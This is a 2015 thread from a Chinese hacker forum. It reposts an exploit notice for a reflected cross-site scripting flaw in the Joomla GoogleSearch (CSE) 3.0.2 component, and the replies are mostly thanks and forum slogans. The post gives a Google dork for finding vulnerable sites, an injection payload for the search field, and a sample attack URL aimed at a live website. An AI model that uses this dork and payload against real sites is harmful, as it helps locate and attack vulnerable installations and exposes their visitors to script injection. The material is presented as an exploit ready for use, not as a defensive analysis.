Joomla GoogleSearch (CSE) 3.0.2 XSS漏洞

90_ · 发表于 2015-9-2 12:04:23

本帖最后由 90_ 于 2015-9-2 12:08 编辑

[PHP] 纯文本查看 复制代码

##############################################
#Exploit title: Joomla Component GoogleSearch (CSE) 3.0.2 - XSS Vulnerability
#Author: Bet0
#Google Dork: inurl:"index.php?option=com_googlesearch_cse"
#Date: 29 Agustus 2015
#Plugins Link: [url]http://extensions.joomla.org/extensions/7023/details[/url]
#Tested on: Mozila Firefox 40.0 and Ubuntu 15.04
##############################################

[+]Piye om Carane (PoC)

Go to Columns Search Input The malicious code "><img src=x onerror=prompt(1)>

复制代码

[+]Sample

http://ihonker.org/index.php?option=com_googlesearch_cse&n=30&Itemid=97&cx=005488517870211354079%3Ao9aiibgwgqs&cof=FORID%3A11&ie=ISO-8859-1&q="><img src=x onerror=prompt(1)>&sa=Search&hl=en&safe=active&siteurl=https%3A%2F%2Fwww.08sec.com

复制代码

H.U.C-麦麦 · 发表于 2015-9-3 02:48:24

支持中国红客联盟(ihonker.org)

arctic · 发表于 2015-9-3 04:24:05

感谢楼主的分享~

admin1964 · 发表于 2015-9-3 18:41:57

感谢楼主的分享~

wtsqq123 · 发表于 2015-9-3 22:46:59

学习学习技术，加油！

r00tc4 · 发表于 2015-9-4 19:13:46

学习学习技术，加油！

ljy07 · 发表于 2015-9-5 00:56:05

学习学习技术，加油！

Micah · 发表于 2015-9-5 04:08:47

还是不错的哦，顶了

Sty，涛 · 发表于 2015-9-5 09:25:54

支持中国红客联盟(ihonker.org)

CHRIS · 发表于 2015-9-6 00:02:50

Joomla GoogleSearch (CSE) 3.0.2 XSS漏洞

相关帖子

指导单位

旗下站点

联系我们